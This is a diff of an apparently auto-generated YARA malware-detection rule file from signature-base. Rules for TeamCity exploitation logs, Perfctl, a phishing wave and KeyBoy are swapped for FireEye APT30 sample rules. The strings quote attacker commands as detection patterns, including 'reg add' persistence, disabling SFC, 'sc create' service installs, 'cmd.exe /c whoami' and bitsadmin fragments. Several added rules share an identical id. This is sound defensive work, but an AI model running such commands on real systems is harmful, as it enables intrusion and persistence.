+		$s8 = "deflate 1.1.3 Copyright" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_CVE_2023_42793_Oct23_1 : CVE_2023_42793
+rule SIGNATURE_BASE_APT30_Generic_E : FILE
 {
 	meta:
-		description = "Detects log entries that could indicate a successful exploitation of CVE-2023-42793 on TeamCity servers"
-		author = "Florian Roth"
-		id = "81c04863-72aa-5515-889e-3ef718360cac"
-		date = "2023-10-02"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "69e76a59-3529-541d-9017-07e6d67fbda4"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_teamcity_2023_42793.yar#L2-L18"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L165-L183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b6c8e3e3ff91563899ca94904a56460cd702a3e58e0aacf1c3acb506ec3f959"
-		score = 70
+		logic_hash = "5ccf1f1334dc300d13aa8dbc080d2d839815d102958fde2b8709c11f522412fd"
+		score = 75
 		quality = 85
-		tags = "CVE-2023-42793"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1dbb584e19499e26398fb0a7aa2a01b7"
+		hash2 = "572c9cd4388699347c0b2edb7c6f5e25"
+		hash3 = "8ff473bedbcc77df2c49a91167b1abeb"
+		hash4 = "a813eba27b2166620bd75029cc1f04b0"
+		hash5 = "b5546842e08950bc17a438d785b5a019"
 
 	strings:
-		$sa1 = "File edited: "
-		$sa2 = "\\TeamCity\\config\\internal.properties by user with id="
-		$sb1 = "s.buildServer.ACTIVITIES.AUDIT - server_file_change: File "
-		$sb2 = "\\TeamCity\\config\\internal.properties was modified by \"user with id"
+		$s0 = "Nkfvtyvn}" ascii
+		$s6 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
 
 	condition:
-		all of ( $sa* ) or all of ( $sb* )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_LOG_EXPL_SUSP_Teamcity_Oct23_1
+rule SIGNATURE_BASE_APT30_Sample_8 : FILE
 {
 	meta:
-		description = "Detects log entries that could indicate a successful exploitation of TeamCity servers"
-		author = "Florian Roth"
-		id = "4845b40a-cf77-53ae-b2fa-d1ed861153f2"
-		date = "2023-10-02"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5053c2db-32a9-58ae-9a72-eb16ef14168e"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_teamcity_2023_42793.yar#L20-L34"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L185-L201"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2f0abffb9c72e6b32875310e5af7365b6cab4e6c4f6188daa3085b57c38ed0e"
-		score = 70
+		hash = "9531e21652143b8b129ab8c023dc05fef2a17cc3"
+		logic_hash = "bff21d517e97d2b13dff2b5ebc9a5b82b8f7635943c89f992b41d269623cd498"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "tbrains.buildServer.ACTIVITIES"
-		$s1 = "External process is launched by user user with id"
-		$s2 = ". Command line: cmd.exe \"/c whoami"
+		$s0 = "ateProcessA" ascii
+		$s1 = "Ternel32.dllFQ" fullword ascii
+		$s2 = "StartupInfoAModuleHand" fullword ascii
+		$s3 = "OpenMutex" fullword ascii
 
 	condition:
-		all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_EXPL_Perfctl_Oct24 : FILE
+rule SIGNATURE_BASE_APT30_Generic_B : FILE
 {
 	meta:
-		description = "Detects exploits used in relation with Perfctl malware campaigns"
-		author = "Florian Roth"
-		id = "1f525eaf-445c-592e-bfa4-e9846390dd1d"
-		date = "2024-10-09"
-		modified = "2024-12-12"
-		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_perfctl_oct24.yar#L2-L21"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "df3b8896-7229-5b3b-ad2f-774b0cea167c"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L203-L222"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "44d4683efc66b3c6c2d32be6b83a2bbc1db39c9a020365dddd27c20667bc6a66"
-		score = 80
+		logic_hash = "527c823607836f138369224b7d8d492d36d9ab7a150e64fd5ebbaf99538d6d53"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "22e4a57ac560ebe1eff8957906589f4dd5934ee555ebcc0f7ba613b07fad2c13"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0fcb4ffe2eb391421ec876286c9ddb6c"
+		hash2 = "29395c528693b69233c1c12bef8a64b3"
+		hash3 = "4c6b21e98ca03e0ef0910e07cef45dac"
+		hash4 = "550459b31d8dabaad1923565b7e50242"
+		hash5 = "65232a8d555d7c4f7bc0d7c5da08c593"
+		hash6 = "853a20f5fc6d16202828df132c41a061"
+		hash7 = "ed151602dea80f39173c2f7b1dd58e06"
 
 	strings:
-		$s1 = "Exploit failed. Target is most likely patched." ascii fullword
-		$s2 = "SHELL=pkexec" ascii fullword
-		$s3 = "/dump_" ascii fullword
-		$s4 = ".EYE$" ascii
+		$s2 = "Moziea/4.0" ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 30000KB and 2 of them or all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_MAL_LNX_Perfctl_Oct24 : FILE
+rule SIGNATURE_BASE_APT30_Generic_I : FILE
 {
 	meta:
-		description = "Detects Perfctl malware samples"
-		author = "Florian Roth"
-		id = "391513ae-3348-5297-a22a-6f06e50f06d2"
-		date = "2024-10-09"
-		modified = "2024-12-12"
-		reference = "https://www.aquasec.com/blog/perfctl-a-stealthy-malware-targeting-millions-of-linux-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_perfctl_oct24.yar#L23-L42"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "55046e1a-731a-5418-9a7a-4fe1611c77d0"
+		date = "2015-04-13"
+		modified = "2023-12-05"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L224-L240"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d47df34240f59124542acc41484e8935327490c04c4e15a558b2ffc6f9c52ea8"
+		logic_hash = "e6f0edcbf6e0590c8b4a558142053d5938e86d13d65787f02336dc2a173d5963"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "a6d3c6b6359ae660d855f978057aab1115b418ed277bb9047cd488f9c7850747"
-		hash2 = "ca3f246d635bfa560f6c839111be554a14735513e90b3e6784bedfe1930bdfd6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fe211c7a081c1dac46e3935f7c614549"
+		hash2 = "8c9db773d387bf9b3f2b6a532e4c937c"
 
 	strings:
-		$op1 = { 83 45 f8 01 8b 45 f8 48 3b 45 98 0f 82 1b ff ff ff 90 c9 c3 55 }
-		$op2 = { 48 8b 55 a0 48 01 ca 0f b6 0a 48 8b 55 a8 89 c0 88 4c 02 18 8b 45 fc 83 e0 3f }
-		$op3 = { 88 4c 10 58 83 45 f8 01 83 7d f8 03 0f 86 68 ff ff ff 90 c9 c3 55 }
-		$op4 = { 48 83 ec 68 48 89 7d a8 48 89 75 a0 48 89 55 98 48 8b 45 a8 48 8b 00 83 e0 3f 89 45 fc }
+		$s0 = "Copyright 2012 Google Inc. All rights reserved." fullword wide
+		$s1 = "(Prxy%c-%s:%u)" fullword ascii
+		$s2 = "Google Inc." fullword wide
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 300KB and 2 of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_1 : FILE
+rule SIGNATURE_BASE_APT30_Sample_9 : FILE
 {
 	meta:
-		description = "Phishing Wave - file p0o6543f.exe"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3335ad3c-47f8-5547-bac0-df2d98ff644f"
-		date = "2015-12-02"
+		id = "bf24bb57-aff9-579c-b8a2-265a6d2a06d0"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_phish_gina_dec15.yar#L8-L29"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L242-L263"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "db788d6d3a8ed1a6dc9626852587f475e7671e12fa9c9faa73b7277886f1e210"
-		logic_hash = "91fc1b4682c1490b916b11685e1ecc74a964d657e544c0b84e8301b299154d02"
+		hash = "442bf8690401a2087a340ce4a48151c39101652f"
+		logic_hash = "0c5465bdafcbca02f855a0cba1fbb4c19d8d21b714dbe777b942dcd1a7acb257"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "netsh.exe" fullword wide
-		$s2 = "routemon.exe" fullword wide
-		$s3 = "script=" fullword wide
-		$s4 = "disconnect" fullword wide
-		$s5 = "GetClusterResourceTypeKey" fullword ascii
-		$s6 = "QueryInformationJobObject" fullword ascii
-		$s7 = "interface" fullword wide
-		$s8 = "connect" fullword wide
-		$s9 = "FreeConsole" fullword ascii
+		$s0 = "\\Windo" ascii
+		$s2 = "oHHOSTR" ascii
+		$s3 = "Softwa]\\Mic" ascii
+		$s4 = "Startup'T" ascii
+		$s6 = "Ora\\%^" ascii
+		$s7 = "\\Ohttp=r" ascii
+		$s17 = "help32Snapshot0L" ascii
+		$s18 = "TimUmoveH" ascii
+		$s20 = "WideChc[lobalAl" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_PHISH_02Dez2015_Dropped_P0O6543F_2 : FILE
+rule SIGNATURE_BASE_APT30_Sample_10 : FILE
 {
 	meta:
-		description = "Phishing Wave used MineExplorer Game by WangLei - file p0o6543f.exe.4"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ed6f6dc8-5b5d-5a6f-a2a0-cb8a34c8931f"
-		date = "2015-12-03"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_phish_gina_dec15.yar#L31-L47"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L264-L283"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f5eb21d0f635171e1edcfecc909bc3508dfb6c32e7fdd7263edd5cd98e6ba411"
+		hash = "eb518cda3c4f4e6938aaaee07f1f7db8ee91c901"
+		logic_hash = "5a6bd8223fbce133bd11b903edfd7f8ff5a436e26a47c048a5ac606ad4a0b564"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d6b21ded749b57042eede07c3af1956a3c9f1faddd22d2f78e43003a11ae496f"
-		hash2 = "561b16643992b92d37cf380bc2ed7cd106e4dcaf25ca45b4ba876ce59533fb02"
 
 	strings:
-		$s1 = "Email: W0067@990.net" fullword wide
-		$s2 = "MineExplorer Version 1.0" fullword wide
-		$s6 = "Copy Rights by WangLei 1999.4" fullword wide
+		$s0 = "Version 4.7.3001" fullword wide
+		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
+		$s2 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
+		$s3 = "!! Use Connect Method !!" fullword ascii
+		$s4 = "(Prxy%c-%s:%u)" fullword ascii
+		$s5 = "msmsgs" fullword wide
+		$s18 = "(Prxy-No)" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_PHISH_02Dez2015_Attach_P_ORD_C_10156_124658 : FILE
+rule SIGNATURE_BASE_APT30_Sample_11 : FILE
 {
 	meta:
-		description = "Phishing Wave - file P-ORD-C-10156-124658.xls"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8989379a-6cd9-52ba-be18-5d402a440758"
-		date = "2015-12-02"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://myonlinesecurity.co.uk/purchase-order-124658-gina-harrowell-clinimed-limited-word-doc-or-excel-xls-spreadsheet-malware/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_phish_gina_dec15.yar#L49-L73"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L285-L312"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a2820b024b371447eab71f153b6251776719cfe55e08cb2a3cda5ee6da29949d"
+		hash = "59066d5d1ee3ad918111ed6fcaf8513537ff49a6"
+		logic_hash = "5e86b53591caa7c783a946205a3d04f91c71294d844e6f6ee88c3bc78e603ea0"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
-		hash2 = "e6c5b55586e9d99551adc27a0fc9c080cea6201fae60104b82d5a2ec518fafb6"
-		hash3 = "80f278b7268ea6814f8b336e07c5f4b03289519e199fbe4cbd9ef6a38cf25df6"
-		hash4 = "3a0a758525883a049a42312e46a023076c31af23b5e8e5b81fec56d51e4c80fb"
-		hash5 = "bc252ede5302240c2fef8bc0291ad5a227906b4e70929a737792e935a5fee209"
-		hash6 = "d9db7d32949c4df6a5d9d0292b576ae19681be7b6e0684df57338390e87fc6d6"
-		hash7 = "7bb705701ae73d377f6091515a140f0af57703719a67da9a60fad4544092ee6c"
-		hash8 = "e743c6e7749ab1046a2beea8733d7c8386ea60b43492bb4f0769ced6a2cee66d"
 
 	strings:
-		$s1 = "Execute" ascii
-		$s2 = "Process WriteParameterFiles" fullword ascii
-		$s3 = "WScript.Shell" fullword ascii
-		$s4 = "STOCKMASTER" fullword ascii
-		$s5 = "InsertEmailFax" ascii
+		$s0 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii
+		$s1 = "msofscan.exe" fullword wide
+		$s2 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii
+		$s3 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
+		$s4 = "Windows XP Professional x64 Edition or Windows Server 2003" fullword ascii
+		$s9 = "NetEagle_Scout - " fullword ascii
+		$s10 = "Server 4.0, Enterprise Edition" fullword ascii
+		$s11 = "Windows 3.1(Win32s)" fullword ascii
+		$s12 = "%s%s%s %s" fullword ascii
+		$s13 = "Server 4.0" fullword ascii
+		$s15 = "Windows Millennium Edition" fullword ascii
+		$s16 = "msofscan" fullword wide
+		$s17 = "Eagle-Norton360-OfficeScan" fullword ascii
+		$s18 = "Workstation 4.0" fullword ascii
+		$s19 = "2003 Microsoft Office system" fullword wide
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 200KB and all of them
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_Keyboys_Malware_1 : FILE
+rule SIGNATURE_BASE_APT30_Sample_12 : FILE
 {
 	meta:
-		description = "Detects Keyboys malware"
+		description = "FireEye APT30 Report Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4e334f62-6ffc-55c3-bcbe-ff4a80fb007d"
-		date = "2017-11-02"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L13-L48"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L314-L329"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "78fb48c4b3e09f0d55ca6049601ea62dd526167481725b48de6624bb27fb943b"
+		hash = "b02b5720ff0f73f01eb2ba029a58b645c987c4bc"
+		logic_hash = "997c91267f956bd7d2a7edca9817ebc80bbf1eed944b3bc01cc8bb01927deb1e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1d716cee0f318ee14d7c3b946a4626a1afe6bb47f69668065e00e099be362e22"
-		hash2 = "a6e9951583073ab2598680b17b8b99bab280d6dca86906243bafaf3febdf1565"
-		hash3 = "34f740e5d845710ede1d942560f503e117600bcc7c5c17e03c09bfc66556196c"
-		hash4 = "750f4a9ae44438bf053ffb344b959000ea624d1964306e4b3806250f4de94bc8"
-		hash5 = "fc84856814307a475300d2a44e8d15635dedd02dc09a088a47d1db03bc309925"
-		hash6 = "0f9a7efcd3a2b1441834dae7b43cd8d48b4fc1daeb2c081f908ac5a1369de753"
 
 	strings:
-		$x1 = "reg add HKLM\\%s\\Parameters /v ServiceDll /t REG_EXPAND_SZ /d \"%s\" /f" fullword ascii
-		$x3 = "Internet using \\svchost.exe -k  -n 3" fullword ascii
-		$x4 = "reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\" /v SFCDisable /t REG_DWORD /d 4 /f" fullword ascii
-		$s1 = "sc create %s binpath= \"%s\" Type= share Start= auto DisplayName= \"%s\"" fullword ascii
-		$s2 = "ExecCmd:%s" fullword ascii
-		$s3 = "szCommand : %s" fullword ascii
-		$s4 = "Current user is a member of the %s\\%s group" fullword ascii
-		$s5 = "icacls %s /grant administrators:F" fullword ascii
-		$s6 = "Ping 127.0.0.1 goto Repeat" fullword ascii
-		$s7 = "Start MoveFile %s -> %s" fullword ascii
-		$s8 = "move %s\\dllcache%s %s\\dllcache\\%s" fullword ascii
-		$s9 = "%s\\cmd.exe /c \"%s\"" fullword ascii
+		$s0 = "Richic" fullword ascii
+		$s1 = "Accept: image/gif, */*" fullword ascii
+		$s2 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "68f7eced34c46808756db4b0c45fb589" or ( pe.exports ( "Insys" ) and pe.exports ( "Inuser" ) and pe.exports ( "SSSS" ) ) or 1 of ( $x* ) or 4 of them )
+		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Keyboy_Installclient : FILE
+rule SIGNATURE_BASE_APT30_Sample_13 : FILE
 {
 	meta:
-		description = "Detects KeyBoy InstallClient"
-		author = "Markus Neis, Florian Roth"
-		id = "d1359f35-d6cd-502b-8cf7-6215bf5e62ba"
-		date = "2018-03-26"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L52-L73"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L331-L349"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "701b87785562dc391191b1e59573c6027b27c4fffe1c9155a82114521c85bc59"
+		hash = "a359f705a833c4a4254443b87645fd579aa94bcf"
+		logic_hash = "cd5285e8b78493b64704cec21c13d0a017d66936aa8356cfea2aa77c6f87b9e7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "85d32cb3ae046a38254b953a00b37bb87047ec435edb0ce359a867447ee30f8b"
-		hash2 = "b0f120b11f727f197353bc2c98d606ed08a06f14a1c012d3db6fe0a812df528a"
-		hash1 = "d65f809f7684b28a6fa2d9397582f350318027999be3acf1241ff44d4df36a3a"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "egsvr32.exe \"/u bitsadmin /canceft\\windows\\currebitsadmin" ascii
-		$x2 = "/addfibitsadmin /Resumbitsadmin /SetNosoftware\\microsotifyCmdLine " ascii
-		$x3 = "D:\\Work\\Project\\VS\\house\\Apple\\" ascii
-		$x4 = "Bj+I11T6z9HFMG5Z5FMT/u62z9zw8FyWV0xrcK7HcYXkiqnAy5tc/iJuKtwM8CT3sFNuQu8xDZQGSR6D8/Bc/Dpuz8gMJFz+IrYqNAzwuPIitg==" fullword ascii
-		$x5 = "szCmd1:%s" fullword ascii
-		$s1 = "cmd.exe /c \"%s\"" fullword ascii
-		$s4 = "rundll32.exe %s Main" fullword ascii
+		$s0 = "msofscan.exe" fullword wide
+		$s1 = "Microsoft? is a registered trademark of Microsoft Corporation." fullword wide
+		$s2 = "Microsoft Office Word Plugin Scan" fullword wide
+		$s3 = "? 2006 Microsoft Corporation.  All rights reserved." fullword wide
+		$s4 = "msofscan" fullword wide
+		$s6 = "2003 Microsoft Office system" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-rule SIGNATURE_BASE_Keyboy_Wab32Res : FILE
+rule SIGNATURE_BASE_APT30_Sample_14 : FILE
 {
 	meta:
-		description = "Detects KeyBoy Loader wab32res.dll"
-		author = "Markus Neis, Florian Roth"
-		id = "0e4045a7-1c45-5043-9e10-e969219b67f8"
-		date = "2018-03-26"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L75-L96"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L351-L367"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5e23bfeed0587ac69527234dd3f8b4f8c5628128ab667af7b99c4d75ca99459b"
+		hash = "b0740175d20eab79a5d62cdbe0ee1a89212a8472"
+		logic_hash = "e5f352b1aa643b9508c01bbe921197ebd8992ec94036b869c55970f0177164d3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "02281e26e89b61d84e2df66a0eeb729c5babd94607b1422505cd388843dd5456"
-		hash2 = "fb9c9cbf6925de8c7b6ce8e7a8d5290e628be0b82a58f3e968426c0f734f38f6"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "B4490-2314-55C1- /Processid:{321bitsadmin /canceft\\windows\\curresoftware\\microso" fullword ascii
-		$x2 = "D:\\Work\\VS\\House\\TSSL\\TSSL\\TClient" ascii
-		$x3 = "\\Release\\FakeRun.pdb" ascii
-		$x4 = "FakeRun.dll" fullword ascii
-		$s1 = "cmd.exe /c \"%s\"" fullword ascii
-		$s2 = "CreateProcess failed (%d)" fullword ascii
-		$s3 = "CreateProcess %s " fullword ascii
-		$s4 = "FindResource %s error " fullword ascii
+		$s0 = "AdobeReader.exe" fullword wide
+		$s4 = "10.1.7.27" fullword wide
+		$s5 = "Copyright 1984-2012 Adobe Systems Incorporated and its licensors. All ri" wide
+		$s8 = "Adobe Reader" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 4 of them )
+		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
 }
-
-rule SIGNATURE_BASE_Keyboy_Rasauto : FILE
+rule SIGNATURE_BASE_APT30_Sample_15 : FILE
 {
 	meta:
-		description = "Detects KeyBoy ServiceClient"
-		author = "Markus Neis, Florian Roth"
-		id = "b6c72a91-fda1-5f40-804f-896b25a8813f"
-		date = "2018-03-26"
+		description = "FireEye APT30 Report Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e5dd6bc9-9383-5d48-92df-709996373655"
+		date = "2015-04-13"
 		modified = "2023-12-05"
-		reference = "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_keyboys.yar#L98-L126"
+		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L369-L387"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "87529000522d5fad4346a0228c96d3adf122587d91b0cff083948787e53cc024"
+		hash = "7a8576804a2bbe4e5d05d1718f90b6a4332df027"
+		logic_hash = "5179f39bdcb064f55479ad147a019dd0b3874783c6bad650e84cfd9d0430bb70"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "49df4fec76a0ffaee5e4d933a734126c1a7b32d1c9cb5ab22a868e8bfc653245"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
